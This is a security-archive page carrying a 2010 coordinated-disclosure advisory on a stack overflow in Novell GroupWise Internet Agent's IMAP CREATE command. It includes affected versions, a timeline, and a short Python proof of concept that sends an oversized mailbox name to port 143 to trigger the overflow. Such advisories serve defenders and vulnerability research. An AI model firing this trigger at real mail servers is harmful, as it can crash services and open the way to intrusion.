exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Novell Groupwise Internet Agent Stack Overflow

Novell Groupwise Internet Agent Stack Overflow
Posted Jul 17, 2010
Authored by Francis Provencher

The Novell Groupwise Internet Agent suffers from a remote code execution vulnerability due to a stack overflow.

tags | exploit, remote, overflow, code execution
SHA-256 | 76736a6c8ea0fb9f7f9a0f12dd5cf5394064dec0c96b1d6cf55ca7dee72c2d5f

Novell Groupwise Internet Agent Stack Overflow

Change Mirror Download
#####################################################################################

Application: Novell Groupwise Internet Agent Stack Overflow

Platforms: Windows, Linux, Netware (GroupWise 7.0, 7.01, 7.02,
7.03x, 7.04, 8.0, 8.01x)

Exploitation: Remote code execution

CVE Number:

Novell TID: 7006374

Author: Francis Provencher (Protek Research Lab's)

WebSite: http://www.protekresearchlab.com/


#####################################################################################

1) Introduction
2) Report Timeline
3) Technical details
4) The Code


#####################################################################################

===============
1) Introduction
===============

Novell, Inc. is a global software and services company based in
Waltham, Massachusetts. The company specializes in

enterprise operating systems, such as SUSE

Linux Enterprise and Novell NetWare; identity, security, and systems
management solutions; and collaboration solutions,

such as Novell Groupwise and Novell

Pulse.

Novell was instrumental in making the Utah Valley a focus for
technology and software development. Novell technology

contributed to the emergence of local

area networks, which displaced the dominant mainframe computing model
and changed computing worldwide. Today, a primary

focus of the company is on developing

open source software for enterprise clients.

(http://en.wikipedia.org/wiki/Novell)

#####################################################################################

============================
2) Report Timeline
============================

2010-04-06 - Vulnerability reported to vendor
2010-07-16 - Coordinated public release of advisory
(http://www.zerodayinitiative.com/advisories/ZDI-10-129/)


#####################################################################################

============================
3) Technical details
============================

This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of Novell Groupwise

Internet Agent. Authentication is required to exploit this vulnerability.

The flaw exists within the IMAP functionality included with GWIA. When
provided with an overly long mailbox name to the

CREATE verb, the IMAP server can be forced to overflow a buffer on the
stack. Successful exploitation leads to remote

code execution under the context of the server.


#####################################################################################

===========
4) The Code
===========

#!/usr/bin/python
#


import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

buffer = '\x41' * 532

s.connect(('192.168.100.177',143))
s.recv(1024)
s.send('A001 LOGIN test@protekresearch.com test ' + buffer + '\r\n')
s.recv(1024)
s.send('A001 CREATE ' + buffer + '\r\n')
s.recv(1024)
s.close()




#####################################################################################
(PRL-2010-06)
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close